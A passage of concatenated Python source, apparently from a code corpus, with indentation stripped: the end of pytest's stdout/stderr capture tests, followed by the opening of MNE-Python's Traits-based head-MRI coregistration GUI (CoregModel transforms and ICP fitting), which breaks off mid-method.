assert out
assert err == ''
def test_capsys_results_accessible_by_attribute(capsys):
sys.stdout.write("spam")
sys.stderr.write("eggs")
capture_result = capsys.readouterr()
assert capture_result.out == "spam"
assert capture_result.err == "eggs"
@needsosdup
@pytest.mark.parametrize('use', [True, False])
def test_fdcapture_tmpfile_remains_the_same(tmpfile, use):
if not use:
tmpfile = True
cap = StdCaptureFD(out=False, err=tmpfile)
try:
cap.start_capturing()
capfile = cap.err.tmpfile
cap.readouterr()
finally:
cap.stop_capturing()
capfile2 = cap.err.tmpfile
assert capfile2 == capfile
@needsosdup
def test_close_and_capture_again(testdir):
testdir.makepyfile("""
import os
def test_close():
os.close(1)
def test_capture_again():
os.write(1, b"hello\\n")
assert 0
""")
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines("""
*test_capture_again*
*assert 0*
*stdout*
*hello*
""")
@pytest.mark.parametrize('method', ['SysCapture', 'FDCapture'])
def test_capturing_and_logging_fundamentals(testdir, method):
if method == "StdCaptureFD" and not hasattr(os, 'dup'):
pytest.skip("need os.dup")
# here we check a fundamental feature
p = testdir.makepyfile("""
import sys, os
import py, logging
from _pytest import capture
cap = capture.MultiCapture(out=False, in_=False,
Capture=capture.%s)
cap.start_capturing()
logging.warn("hello1")
outerr = cap.readouterr()
print ("suspend, captured %%s" %%(outerr,))
logging.warn("hello2")
cap.pop_outerr_to_orig()
logging.warn("hello3")
outerr = cap.readouterr()
print ("suspend2, captured %%s" %% (outerr,))
""" % (method,))
result = testdir.runpython(p)
result.stdout.fnmatch_lines("""
suspend, captured*hello1*
suspend2, captured*WARNING:root:hello3*
""")
result.stderr.fnmatch_lines("""
WARNING:root:hello2
""")
assert "atexit" not in result.stderr.str()
def test_error_attribute_issue555(testdir):
testdir.makepyfile("""
import sys
def test_capattr():
assert sys.stdout.errors == "strict"
assert sys.stderr.errors == "strict"
""")
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
@pytest.mark.skipif(not sys.platform.startswith('win') and sys.version_info[:2] >= (3, 6),
reason='only py3.6+ on windows')
def test_py36_windowsconsoleio_workaround_non_standard_streams():
"""
Ensure _py36_windowsconsoleio_workaround function works with objects that
do not implement the full ``io``-based stream protocol, for example execnet channels (#2666).
"""
from _pytest.capture import _py36_windowsconsoleio_workaround
class DummyStream(object):
def write(self, s):
pass
stream = DummyStream()
_py36_windowsconsoleio_workaround(stream)
def test_dontreadfrominput_has_encoding(testdir):
testdir.makepyfile("""
import sys
def test_capattr():
# should not raise AttributeError
assert sys.stdout.encoding
assert sys.stderr.encoding
""")
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_crash_on_closing_tmpfile_py27(testdir):
testdir.makepyfile('''
from __future__ import print_function
import time
import threading
import sys
def spam():
f = sys.stderr
while True:
print('.', end='', file=f)
def test_silly():
t = threading.Thread(target=spam)
t.daemon = True
t.start()
time.sleep(0.5)
''')
result = testdir.runpytest_subprocess()
assert result.ret == 0
assert 'IOError' not in result.stdout.str()
def test_pickling_and_unpickling_encoded_file():
# See https://bitbucket.org/pytest-dev/pytest/pull-request/194
# pickle.loads() raises infinite recursion if
# EncodedFile.__getattr__ is not implemented properly
ef = capture.EncodedFile(None, None)
ef_as_str = pickle.dumps(ef)
pickle.loads(ef_as_str)
|
_coreg_gui.py
|
# -*- coding: utf-8 -*-
u"""Traits-based GUI for head-MRI coregistration.
Hierarchy
---------
This is the hierarchy of classes for control. Brackets like [1] denote
properties that are set to be equivalent.
::
CoregFrame: GUI for head-MRI coregistration.
|-- CoregModel (model): Traits object for estimating the head mri transform.
| |-- MRIHeadWithFiducialsModel (mri) [1]: Represent an MRI head shape (high and low res) with fiducials.
| | |-- SurfaceSource (bem_high_res): High-res MRI head
| | |-- SurfaceSource (bem_low_res): Low-res MRI head
| | +-- MRISubjectSource (subject_source) [2]: Find subjects in SUBJECTS_DIR and select one.
| |-- FiducialsSource (fid): Expose points of a given fiducials fif file.
| +-- DigSource (hsp): Expose measurement information from a inst file.
|-- MlabSceneModel (scene) [3]: mayavi.core.ui.mayavi_scene
|-- DataPanel (data_panel)
| |-- HeadViewController (headview) [4]: Set head views for the given coordinate system.
| | +-- MlabSceneModel (scene) [3*]: ``HeadViewController(scene=CoregFrame.scene)``
| |-- SubjectSelectorPanel (subject_panel): Subject selector panel
| | +-- MRISubjectSource (model) [2*]: ``SubjectSelectorPanel(model=self.model.mri.subject_source)``
| +-- FiducialsPanel (fid_panel): Set fiducials on an MRI surface.
| |-- MRIHeadWithFiducialsModel (model) [1*]: ``FiducialsPanel(model=CoregFrame.model.mri, headview=CoregFrame.headview)``
| |-- HeadViewController (headview) [4*]: ``FiducialsPanel(model=CoregFrame.model.mri, headview=CoregFrame.headview)``
| +-- SurfaceObject (hsp_obj) [5*]: ``CoregFrame.fid_panel.hsp_obj = CoregFrame.mri_obj``
|-- CoregPanel (coreg_panel): Coregistration panel for Head<->MRI with scaling.
| +-- FittingOptionsPanel (fitting_options_panel): panel for fitting options.
|-- SurfaceObject (mri_obj) [5]: Represent a solid object in a mayavi scene.
+-- PointObject ({hsp, eeg, lpa, nasion, rpa, hsp_lpa, hsp_nasion, hsp_rpa} + _obj): Represent a group of individual points in a mayavi scene.
In the MRI viewing frame, MRI points are transformed via scaling, then by
mri_head_t to the Neuromag head coordinate frame. Digitized points (in head
coordinate frame) are never transformed.
Units
-----
User-facing GUI values are in readable units:
- ``scale_*`` are in %
- ``trans_*`` are in mm
- ``rot_*`` are in °
Internal computation quantities ``parameters`` are in units of (for X/Y/Z):
- ``parameters[:3]`` are in radians
- ``parameters[3:6]`` are in m
- ``paramteres[6:9]`` are in scale proportion
Conversions are handled via `np.deg2rad`, `np.rad2deg`, and appropriate
multiplications / divisions.
""" # noqa: E501
# Authors: Christian Brodbeck <christianbrodbeck@nyu.edu>
#
# License: BSD (3-clause)
import os
import queue
import re
import time
from threading import Thread
import traceback
import warnings
import numpy as np
from mayavi.core.ui.mayavi_scene import MayaviScene
from mayavi.tools.mlab_scene_model import MlabSceneModel
from pyface.api import (error, confirm, OK, YES, NO, CANCEL, information,
FileDialog, GUI)
from traits.api import (Bool, Button, cached_property, DelegatesTo, Directory,
Enum, Float, HasTraits, HasPrivateTraits, Instance,
Int, on_trait_change, Property, Str, List)
from traitsui.api import (View, Item, Group, HGroup, VGroup, VGrid, EnumEditor,
Handler, Label, Spring, InstanceEditor, StatusItem,
UIInfo)
from traitsui.menu import Action, UndoButton, CancelButton, NoButtons
from tvtk.pyface.scene_editor import SceneEditor
from ..bem import make_bem_solution, write_bem_solution
from ..coreg import bem_fname, trans_fname
from ..defaults import DEFAULTS
from ..surface import _DistanceQuery, _CheckInside
from ..transforms import (write_trans, read_trans, apply_trans, rotation,
rotation_angles, Transform, _ensure_trans,
rot_to_quat, _angle_between_quats)
from ..coreg import fit_matched_points, scale_mri, _find_fiducials_files
from ..viz.backends._pysurfer_mayavi import _toggle_mlab_render
from ..utils import logger, set_config, _pl
from ._fiducials_gui import MRIHeadWithFiducialsModel, FiducialsPanel
from ._file_traits import trans_wildcard, DigSource, SubjectSelectorPanel
from ._viewer import (HeadViewController, PointObject, SurfaceObject,
_DEG_WIDTH, _MM_WIDTH, _BUTTON_WIDTH,
_SHOW_BORDER, _COREG_WIDTH, _SCALE_STEP_WIDTH,
_INC_BUTTON_WIDTH, _SCALE_WIDTH, _WEIGHT_WIDTH,
_MM_STEP_WIDTH, _DEG_STEP_WIDTH, _REDUCED_TEXT_WIDTH,
_RESET_LABEL, _RESET_WIDTH,
laggy_float_editor_scale, laggy_float_editor_deg,
laggy_float_editor_mm, laggy_float_editor_weight)
try:
from traitsui.api import RGBColor
except ImportError:
from traits.api import RGBColor
defaults = DEFAULTS['coreg']
class busy(object):
"""Set the GUI state to busy."""
def __enter__(self): # noqa: D105
GUI.set_busy(True)
def __exit__(self, type, value, traceback): # noqa: D105
GUI.set_busy(False)
def _pass(x):
"""Format text without changing it."""
return x
class CoregModel(HasPrivateTraits):
"""Traits object for estimating the head mri transform.
Notes
-----
Transform from head to mri space is modelled with the following steps:
* move the head shape to its nasion position
* rotate the head shape with user defined rotation around its nasion
* move the head shape by user defined translation
* move the head shape origin to the mri nasion
If MRI scaling is enabled,
* the MRI is scaled relative to its origin center (prior to any
transformation of the digitizer head)
Don't sync transforms to anything to prevent them from being recomputed
upon every parameter change.
"""
# data sources
mri = Instance(MRIHeadWithFiducialsModel, ())
hsp = Instance(DigSource, ())
# parameters
guess_mri_subject = Bool(True) # change MRI subject when dig file changes
grow_hair = Float(label=u"ΔHair", desc="Move the back of the MRI "
"head outwards to compensate for hair on the digitizer "
"head shape (mm)")
n_scale_params = Enum(0, 1, 3, desc="Scale the MRI to better fit the "
"subject's head shape (a new MRI subject will be "
"created with a name specified upon saving)")
scale_x = Float(100, label="X")
scale_y = Float(100, label="Y")
scale_z = Float(100, label="Z")
trans_x = Float(0, label=u"ΔX")
trans_y = Float(0, label=u"ΔY")
trans_z = Float(0, label=u"ΔZ")
rot_x = Float(0, label=u"∠X")
rot_y = Float(0, label=u"∠Y")
rot_z = Float(0, label=u"∠Z")
parameters = List()
last_parameters = List()
lpa_weight = Float(1.)
nasion_weight = Float(10.)
rpa_weight = Float(1.)
hsp_weight = Float(1.)
eeg_weight = Float(1.)
hpi_weight = Float(1.)
iteration = Int(-1)
icp_iterations = Int(20)
icp_start_time = Float(0.0)
icp_angle = Float(0.2)
icp_distance = Float(0.2)
icp_scale = Float(0.2)
icp_fid_match = Enum('nearest', 'matched')
fit_icp_running = Bool(False)
fits_icp_running = Bool(False)
coord_frame = Enum('mri', 'head', desc='Display coordinate frame')
status_text = Str()
# options during scaling
scale_labels = Bool(True, desc="whether to scale *.label files")
copy_annot = Bool(True, desc="whether to copy *.annot files for scaled "
"subject")
prepare_bem_model = Bool(True, desc="whether to run make_bem_solution "
"after scaling the MRI")
# secondary to parameters
has_nasion_data = Property(
Bool, depends_on=['mri:nasion', 'hsp:nasion'])
has_lpa_data = Property(
Bool, depends_on=['mri:lpa', 'hsp:lpa'])
has_rpa_data = Property(
Bool, depends_on=['mri:rpa', 'hsp:rpa'])
has_fid_data = Property( # conjunction
Bool, depends_on=['has_nasion_data', 'has_lpa_data', 'has_rpa_data'])
has_mri_data = Property(
Bool, depends_on=['transformed_high_res_mri_points'])
has_hsp_data = Property(
Bool, depends_on=['has_mri_data', 'hsp:points'])
has_eeg_data = Property(
Bool, depends_on=['has_mri_data', 'hsp:eeg_points'])
has_hpi_data = Property(
Bool, depends_on=['has_mri_data', 'hsp:hpi_points'])
n_icp_points = Property(
Int, depends_on=['has_nasion_data', 'nasion_weight',
'has_lpa_data', 'lpa_weight',
'has_rpa_data', 'rpa_weight',
'hsp:points', 'hsp_weight',
'hsp:eeg_points', 'eeg_weight',
'hsp:hpi_points', 'hpi_weight'])
changes = Property(depends_on=['parameters', 'old_parameters'])
# target transforms
mri_head_t = Property(
desc="Transformation of the scaled MRI to the head coordinate frame.",
depends_on=['parameters[]'])
head_mri_t = Property(depends_on=['mri_head_t'])
mri_trans_noscale = Property(depends_on=['mri_head_t', 'coord_frame'])
mri_trans = Property(depends_on=['mri_trans_noscale', 'parameters[]'])
hsp_trans = Property(depends_on=['head_mri_t', 'coord_frame'])
# info
subject_has_bem = DelegatesTo('mri')
lock_fiducials = DelegatesTo('mri')
can_prepare_bem_model = Property(
Bool,
depends_on=['n_scale_params', 'subject_has_bem'])
can_save = Property(Bool, depends_on=['mri_head_t'])
raw_subject = Property(
desc="Subject guess based on the raw file name.",
depends_on=['hsp:inst_fname'])
# Always computed in the MRI coordinate frame for speed
# (building the nearest-neighbor tree is slow!)
# though it will always need to be rebuilt in (non-uniform) scaling mode
nearest_calc = Instance(_DistanceQuery)
# MRI geometry transformed to viewing coordinate system
processed_high_res_mri_points = Property(
depends_on=['mri:bem_high_res:surf', 'grow_hair'])
processed_low_res_mri_points = Property(
depends_on=['mri:bem_low_res:surf', 'grow_hair'])
transformed_high_res_mri_points = Property(
depends_on=['processed_high_res_mri_points', 'mri_trans'])
transformed_low_res_mri_points = Property(
depends_on=['processed_low_res_mri_points', 'mri_trans'])
nearest_transformed_high_res_mri_idx_lpa = Property(
depends_on=['nearest_calc', 'hsp:lpa', 'head_mri_t'])
nearest_transformed_high_res_mri_idx_nasion = Property(
depends_on=['nearest_calc', 'hsp:nasion', 'head_mri_t'])
nearest_transformed_high_res_mri_idx_rpa = Property(
depends_on=['nearest_calc', 'hsp:rpa', 'head_mri_t'])
nearest_transformed_high_res_mri_idx_hsp = Property(
depends_on=['nearest_calc', 'hsp:points', 'head_mri_t'])
nearest_transformed_high_res_mri_idx_orig_hsp = Property(
depends_on=['nearest_calc', 'hsp:points', 'head_mri_t'])
nearest_transformed_high_res_mri_idx_eeg = Property(
depends_on=['nearest_calc', 'hsp:eeg_points', 'head_mri_t'])
nearest_transformed_high_res_mri_idx_hpi = Property(
depends_on=['nearest_calc', 'hsp:hpi_points', 'head_mri_t'])
transformed_mri_lpa = Property(
depends_on=['mri:lpa', 'mri_trans'])
transformed_mri_nasion = Property(
depends_on=['mri:nasion', 'mri_trans'])
transformed_mri_rpa = Property(
depends_on=['mri:rpa', 'mri_trans'])
# HSP geometry transformed to viewing coordinate system
transformed_hsp_points = Property(
depends_on=['hsp:points', 'hsp_trans'])
transformed_orig_hsp_points = Property(
depends_on=['hsp:_hsp_points', 'hsp_trans'])
transformed_hsp_lpa = Property(
depends_on=['hsp:lpa', 'hsp_trans'])
transformed_hsp_nasion = Property(
depends_on=['hsp:nasion', 'hsp_trans'])
transformed_hsp_rpa = Property(
depends_on=['hsp:rpa', 'hsp_trans'])
transformed_hsp_eeg_points = Property(
depends_on=['hsp:eeg_points', 'hsp_trans'])
transformed_hsp_hpi = Property(
depends_on=['hsp:hpi_points', 'hsp_trans'])
# fit properties
lpa_distance = Property(
depends_on=['transformed_mri_lpa', 'transformed_hsp_lpa'])
nasion_distance = Property(
depends_on=['transformed_mri_nasion', 'transformed_hsp_nasion'])
rpa_distance = Property(
depends_on=['transformed_mri_rpa', 'transformed_hsp_rpa'])
point_distance = Property( # use low res points
depends_on=['nearest_transformed_high_res_mri_idx_hsp',
'nearest_transformed_high_res_mri_idx_eeg',
'nearest_transformed_high_res_mri_idx_hpi',
'hsp_weight',
'eeg_weight',
'hpi_weight'])
orig_hsp_point_distance = Property( # use low res points
depends_on=['nearest_transformed_high_res_mri_idx_orig_hsp',
'hpi_weight'])
# fit property info strings
fid_eval_str = Property(
depends_on=['lpa_distance', 'nasion_distance', 'rpa_distance'])
points_eval_str = Property(
depends_on=['point_distance'])
def _parameters_default(self):
return list(_DEFAULT_PARAMETERS)
def _last_parameters_default(self):
return list(_DEFAULT_PARAMETERS)
@cached_property
def _get_can_prepare_bem_model(self):
return self.subject_has_bem and self.n_scale_params > 0
@cached_property
def _get_can_save(self):
return np.any(self.mri_head_t != np.eye(4))
@cached_property
def _get_has_lpa_data(self):
return (np.any(self.mri.lpa) and np.any(self.hsp.lpa))
@cached_property
def _get_has_nasion_data(self):
return (np.any(self.mri.nasion) and np.any(self.hsp.nasion))
@cached_property
def _get_has_rpa_data(self):
return (np.any(self.mri.rpa) and np.any(self.hsp.rpa))
@cached_property
def _get_has_fid_data(self):
return self.has_nasion_data and self.has_lpa_data and self.has_rpa_data
@cached_property
def _get_has_mri_data(self):
return len(self.transformed_high_res_mri_points) > 0
@cached_property
def _get_has_hsp_data(self):
return (self.has_mri_data and
len(self.nearest_transformed_high_res_mri_idx_hsp) > 0)
@cached_property
def _get_has_eeg_data(self):
return (self.has_mri_data and
len(self.nearest_transformed_high_res_mri_idx_eeg) > 0)
@cached_property
def _get_has_hpi_data(self):
return (self.has_mri_data and
len(self.nearest_transformed_high_res_mri_idx_hpi) > 0)
@cached_property
def _get_n_icp_points(self):
"""Get parameters for an ICP iteration."""
n = (self.hsp_weight > 0) * len(self.hsp.points)
for key in ('lpa', 'nasion', 'rpa'):
if getattr(self, 'has_%s_data' % key):
n += 1
n += (self.eeg_weight > 0) * len(self.hsp.eeg_points)
n += (self.hpi_weight > 0) * len(self.hsp.hpi_points)
return n
@cached_property
def _get_changes(self):
new = np.array(self.parameters, float)
old = np.array(self.last_parameters, float)
move = np.linalg.norm(old[3:6] - new[3:6]) * 1e3
angle = np.rad2deg(_angle_between_quats(
rot_to_quat(rotation(*new[:3])[:3, :3]),
rot_to_quat(rotation(*old[:3])[:3, :3])))
percs = 100 * (new[6:] - old[6:]) / old[6:]
return move, angle, percs
@cached_property
def _get_mri_head_t(self):
# rotate and translate hsp
trans = rotation(*self.parameters[:3])
trans[:3, 3] = np.array(self.parameters[3:6])
return trans
@cached_property
def _get_head_mri_t(self):
trans = rotation(*self.parameters[:3]).T
trans[:3, 3] = -np.dot(trans[:3, :3], self.parameters[3:6])
# should be the same as np.linalg.inv(self.mri_head_t)
return trans
@cached_property
def _get_processed_high_res_mri_points(self):
return self._get_processed_mri_points('high')
@cached_property
def _get_processed_low_res_mri_points(self):
return self._get_processed_mri_points('low')
def _get_processed_mri_points(self, res):
bem = self.mri.bem_low_res if res == 'low' else self.mri.bem_high_res
if self.grow_hair:
if len(bem.surf.nn):
scaled_hair_dist = (1e-3 * self.grow_hair /
np.array(self.parameters[6:9]))
points = bem.surf.rr.copy()
hair = points[:, 2] > points[:, 1]
points[hair] += bem.surf.nn[hair] * scaled_hair_dist
return points
else:
error(None, "Norms missing from bem, can't grow hair")
self.grow_hair = 0
else:
return bem.surf.rr
@cached_property
def _get_mri_trans(self):
t = self.mri_trans_noscale.copy()
t[:, :3] *= self.parameters[6:9]
return t
@cached_property
def _get_mri_trans_noscale(self):
if self.coord_frame == 'head':
t = self.mri_head_t
else:
t = np.eye(4)
return t
@cached_property
def _get_hsp_trans(self):
if self.coord_frame == 'head':
t = np.eye(4)
else:
t = self.head_mri_t
return t
@cached_property
def _get_nearest_transformed_high_res_mri_idx_lpa(self):
return self.nearest_calc.query(
apply_trans(self.head_mri_t, self.hsp.lpa))[1]
@cached_property
def _get_nearest_transformed_high_res_mri_idx_nasion(self):
return self.nearest_calc.query(
apply_trans(self.head_mri_t, self.hsp.nasion))[1]
@cached_property
def _get_nearest_transformed_high_res_mri_idx_rpa(self):
return self.nearest_calc.query(
apply_trans(self.head_mri_t, self.hsp.rpa))[1]
@cached_property
def _get_nearest_transformed_high_res_mri_idx_hsp(self):
return self.nearest_calc.query(
apply_trans(self.head_mri_t, self.hsp.points))[1]
@cached_property
def _get_nearest_transformed_high_res_mri_idx_orig_hsp(self):
# This is redundant to some extent with the one above due to
# overlapping points, but it's fast and the refactoring to
# remove redundancy would be a pain.
return self.nearest_calc.query(
apply_trans(self.head_mri_t, self.hsp._hsp_points))[1]
@cached_property
def _get_nearest_transformed_high_res_mri_idx_eeg(self):
return self.nearest_calc.query(
apply_trans(self.head_mri_t, self.hsp.eeg_points))[1]
@cached_property
def _get_nearest_transformed_high_res_mri_idx_hpi(self):
return self.nearest_calc.query(
apply_trans(self.head_mri_t, self.hsp.hpi_points))[1]
# MRI view-transformed data
@cached_property
def _get_transformed_low_res_mri_points(self):
points = apply_trans(self.mri_trans,
self.processed_low_res_mri_points)
return points
def _nearest_calc_default(self):
return _DistanceQuery(
self.processed_high_res_mri_points * self.parameters[6:9])
@on_trait_change('processed_high_res_mri_points')
def _update_nearest_calc(self):
self.nearest_calc = self._nearest_calc_default()
@cached_property
def _get_transformed_high_res_mri_points(self):
points = apply_trans(self.mri_trans,
self.processed_high_res_mri_points)
return points
@cached_property
def _get_transformed_mri_lpa(self):
return apply_trans(self.mri_trans, self.mri.lpa)
@cached_property
def _get_transformed_mri_nasion(self):
return apply_trans(self.mri_trans, self.mri.nasion)
@cached_property
def _get_transformed_mri_rpa(self):
return apply_trans(self.mri_trans, self.mri.rpa)
# HSP view-transformed data
@cached_property
def _get_transformed_hsp_points(self):
return apply_trans(self.hsp_trans, self.hsp.points)
@cached_property
def _get_transformed_orig_hsp_points(self):
return apply_trans(self.hsp_trans, self.hsp._hsp_points)
@cached_property
def _get_transformed_hsp_lpa(self):
return apply_trans(self.hsp_trans, self.hsp.lpa)
@cached_property
def _get_transformed_hsp_nasion(self):
return apply_trans(self.hsp_trans, self.hsp.nasion)
@cached_property
def _get_transformed_hsp_rpa(self):
return apply_trans(self.hsp_trans, self.hsp.rpa)
@cached_property
def _get_transformed_hsp_eeg_points(self):
return apply_trans(self.hsp_trans, self.hsp.eeg_points)
@cached_property
def _get_transformed_hsp_hpi(self):
return apply_trans(self.hsp_trans, self.hsp.hpi_points)
# Distances, etc.
@cached_property
def _get_lpa_distance(self):
d = np.ravel(self.transformed_mri_lpa - self.transformed_hsp_lpa)
return np.linalg.norm(d)
@cached_property
def _get_nasion_distance(self):
d = np.ravel(self.transformed_mri_nasion - self.transformed_hsp_nasion)
return np.linalg.norm(d)
@cached_property
def _get_rpa_distance(self):
d = np.ravel(self.transformed_mri_rpa - self.transformed_hsp_rpa)
return np.linalg.norm(d)
@cached_property
def _get_point_distance(self):
mri_points = list()
hsp_points = list()
if self.hsp_weight > 0 and self.has_hsp_data:
mri_points.append(self.transformed_high_res_mri_points[
self.nearest_transformed_high_res_mri_idx_hsp])
hsp_points.append(self.transformed_hsp_points)
assert len(mri_points[-1]) == len(hsp_points[-1])
if self.eeg_weight > 0 and self.has_eeg_data:
mri_points.append(self.transformed_high_res_mri_points[
self.nearest_transformed_high_res_mri_idx_eeg])
hsp_points.append(self.transformed_hsp_eeg_points)
assert len(mri_points[-1]) == len(hsp_points[-1])
if self.hpi_weight > 0 and self.has_hpi_data:
mri_points.append(self.transformed_high_res_mri_points[
self.nearest_transformed_high_res_mri_idx_hpi])
hsp_points.append(self.transformed_hsp_hpi)
assert len(mri_points[-1]) == len(hsp_points[-1])
if all(len(h) == 0 for h in hsp_points):
return None
mri_points = np.concatenate(mri_points)
hsp_points = np.concatenate(hsp_points)
return np.linalg.norm(mri_points - hsp_points, axis=-1)
@cached_property
def _get_orig_hsp_point_distance(self):
mri_points = self.transformed_high_res_mri_points[
self.nearest_transformed_high_res_mri_idx_orig_hsp]
hsp_points = self.transformed_orig_hsp_points
return np.linalg.norm(mri_points - hsp_points, axis=-1)
@cached_property
def _get_fid_eval_str(self):
d = (self.lpa_distance * 1000, self.nasion_distance * 1000,
self.rpa_distance * 1000)
return u'Fiducials: %.1f, %.1f, %.1f mm' % d
@cached_property
def _get_points_eval_str(self):
if self.point_distance is None:
return ""
dists = 1000 * self.point_distance
av_dist = np.mean(dists)
std_dist = np.std(dists)
kinds = [kind for kind, check in
(('HSP', self.hsp_weight > 0 and self.has_hsp_data),
('EEG', self.eeg_weight > 0 and self.has_eeg_data),
('HPI', self.hpi_weight > 0 and self.has_hpi_data))
if check]
return (u"%s %s: %.1f ± %.1f mm"
% (len(dists), '+'.join(kinds), av_dist, std_dist))
def _get_raw_subject(self):
# subject name guessed based on the inst file name
if '_' in self.hsp.inst_fname:
subject, _ = self.hsp.inst_fname.split('_', 1)
if subject:
return subject
@on_trait_change('raw_subject')
def _on_raw_subject_change(self, subject):
if self.guess_mri_subject:
if subject in self.mri.subject_source.subjects:
self.mri.subject = subject
elif 'fsaverage' in self.mri.subject_source.subjects:
self.mri.subject = 'fsaverage'
def omit_hsp_points(self, distance):
"""Exclude head shape points that are far away from the MRI head.
Parameters
----------
distance : float
Exclude all points that are further away from the MRI head than
this distance. Previously excluded points are still excluded unless
reset=True is specified. A value of distance <= 0 excludes nothing.
reset : bool
Reset the filter before calculating new omission (default is
False).
"""
distance = float(distance)
if distance <= 0:
return
# find the new filter
mask = self.orig_hsp_point_distance <= distance
n_excluded = np.sum(~mask)
logger.info("Coregistration: Excluding %i head shape points with "
"distance >= %.3f m.", n_excluded, distance)
# set the filter
with warnings.catch_warnings(record=True): # comp to None in Traits
self.hsp.points_filter = mask
def fit_fiducials(self, n_scale_params=None):
"""Find rotation and translation to fit all 3 fiducials."""
if n_scale_params is None:
n_scale_params = self.n_scale_params
head_pts = np.vstack((self.hsp.lpa, self.hsp.nasion, self.hsp.rpa))
mri_pts = np.vstack((self.mri.lpa, self.mri.nasion, self.mri.rpa))
weights = [self.lpa_weight, self.nasion_weight, self.rpa_weight]
assert n_scale_params in (0, 1) # guaranteed by GUI
if n_scale_params == 0:
mri_pts *= self.parameters[6:9] # not done in fit_matched_points
x0 = np.array(self.parameters[:6 + n_scale_params])
est = fit_matched_points(mri_pts, head_pts, x0=x0, out='params',
scale=n_scale_params, weights=weights)
if n_scale_params == 0:
self.parameters[:6] = est
else:
self.parameters[:] = np.concatenate([est, [est[-1]] * 2])
def _setup_icp(self, n_scale_params):
"""Get parameters for an ICP iteration."""
head_pts = list()
mri_pts = list()
weights = list()
if self.has_hsp_data and self.hsp_weight > 0: # should be true
head_pts.append(self.hsp.points)
mri_pts.append(self.processed_high_res_mri_points[
self.nearest_transformed_high_res_mri_idx_hsp])
weights.append(np.full(len(head_pts[-1]), self.hsp_weight))
for key in ('lpa', 'nasion', 'rpa'):
if getattr(self, 'has_%s_data' % key):
head_pts.append(getattr(self.hsp, key))
if self.icp_fid_match == 'matched':
mri_pts.append(getattr(self.mri, key))
else:
assert self.icp_fid_match == 'nearest'
mri_pts.append(self.processed_high_res_mri_points[
getattr(self, 'nearest_transformed_high_res_mri_idx_%s'
% (key,))])
weights.append(np.full(len(mri_pts[-1]),
getattr(self, '%s_weight' % key)))
if self.has_eeg_data and self.eeg_weight > 0:
head_pts.append(self.hsp.eeg_points)
mri_pts.append(self.processed_high_res_mri_points[
self.nearest_transformed_high_res_mri_idx_eeg])
weights.append(np.full(len(mri_pts[-1]), self.eeg_weight))
if self.has_hpi_data and self.hpi_weight > 0:
head_pts.append(self.hsp.hpi_points)
mri_pts.append(self.processed_high_res_mri_points[
self.nearest_transformed_high_res_mri_idx_hpi])
weights.append(np.full(len(mri_pts[-1]), self.hpi_weight))
head_pts = np.concatenate(head_pts)
mri_pts = np.concatenate(mri_pts)
weights = np.concatenate(weights)
if n_scale_params == 0:
mri_pts *= self.parameters[6:9] # not done in fit_matched_points
return head_pts, mri_pts, weights
def fit_icp(self, n_scale_params=None):
"""Find MRI scaling, translation, and rotation to match HSP."""
if n_scale_params is None:
n_scale_params = self.n_scale_params
# Initial guess (current state)
assert n_scale_params in (0, 1, 3)
est = self.parameters[:[6, 7, None, 9][n_scale_params]]
# Do the fits, assigning and evaluating at each step
attr = 'fit_icp_running' if n_scale_params == 0 else 'fits_icp_running'
setattr(self, attr, True)
GUI.process_events() # update the cancel button
self.icp_start_time = time.time()
for self.iteration in range(self.icp_iterations):
head_pts, mri_pts, weights = self._setup_icp(n_scale_params)
est = fit_matched_points(mri_pts, head_pts, scale=n_scale_params,
x0=est, out='params', weights=weights)
if n_scale_params == 0:
self.parameters[:6] = est
elif n_scale_params == 1:
self.parameters[:] = list(est) + [est[-1]] * 2
else:
self.parameters[:] = est
angle, move, scale = self.changes
if angle <= self.icp_angle and move <= self.icp_distance and \
all(scale <= self.icp_scale):
self.status_text = self.status_text[:-1] + '; converged)'
break
if not getattr(self, attr): # canceled by user
self.status_text = self.status_text[:-1] + '; cancelled)'
break
GUI.process_events() # this will update the head view
else:
self.status_text = self.status_text[:-1] + '; did not converge)'
setattr(self, attr, False)
self.iteration = -1
def get_scaling_job(self, subject_to, skip_fiducials):
"""Find all arguments needed for the scaling worker."""
subjects_dir = self.mri.subjects_dir
subject_from = self.mri.subject
bem_names = []
if self.can_prepare_bem_model and self.prepare_bem_model:
pattern = bem_fname.format(subjects_dir=subjects_dir,
subject=subject_from, name='(.+-bem)')
bem_dir, pattern = os.path.split(pattern)
for filename in os.listdir(bem_dir):
match = re.match(pattern, filename)
if match:
bem_names.append(match.group(1))
return (subjects_dir, subject_from, subject_to, self.parameters[6:9],
skip_fiducials, self.scale_labels, self.copy_annot, bem_names)
def load_trans(self, fname):
"""Load the head-mri transform from a fif file.
Parameters
----------
fname : str
File path.
"""
self.set_trans(_ensure_trans(read_trans(fname, return_all=True),
'mri', 'head')['trans'])
def reset(self):
"""Reset all the parameters affecting the coregistration."""
with busy():
self.reset_traits(('grow_hair', 'n_scaling_params'))
self.parameters[:] = _DEFAULT_PARAMETERS
self.omit_hsp_points(np.inf)
def set_trans(self, mri_head_t):
"""Set rotation and translation params from a transformation matrix.
Parameters
----------
mri_head_t : array, shape (4, 4)
Transformation matrix from MRI to head space.
"""
with busy():
rot_x, rot_y, rot_z = rotation_angles(mri_head_t)
x, y, z = mri_head_t[:3, 3]
self.parameters[:6] = [rot_x, rot_y, rot_z, x, y, z]
def save_trans(self, fname):
"""Save the head-mri transform as a fif file.
Parameters
----------
fname : str
Target file path.
"""
if not self.can_save:
raise RuntimeError("Not enough information for saving transform")
write_trans(fname, Transform('head', 'mri', self.head_mri_t))
def _parameters_items_changed(self):
# Update GUI as necessary
n_scale = self.n_scale_params
for ii, key in enumerate(('rot_x', 'rot_y', 'rot_z')):
val = np.rad2deg(self.parameters[ii])
if val != getattr(self, key): # prevent circular
setattr(self, key, val)
for ii, key in enumerate(('trans_x', 'trans_y', 'trans_z')):
val = self.parameters[ii + 3] * 1e3
if val != getattr(self, key): # prevent circular
setattr(self, key, val)
for ii, key in enumerate(('scale_x', 'scale_y', 'scale_z')):
val = self.parameters[ii + 6] * 1e2
if val != getattr(self, key): # prevent circular
setattr(self, key, val)
# Only update our nearest-neighbor if necessary
if self.parameters[6:9] != self.last_parameters[6:9]:
self._update_nearest_calc()
# Update the status text
move, angle, percs = self.changes
text = u'Change: Δ=%0.1f mm ∠=%0.2f°' % (move, angle)
if n_scale:
text += ' Scale ' if n_scale == 1 else ' Sx/y/z '
text += '/'.join(['%+0.1f%%' % p for p in percs[:n_scale]])
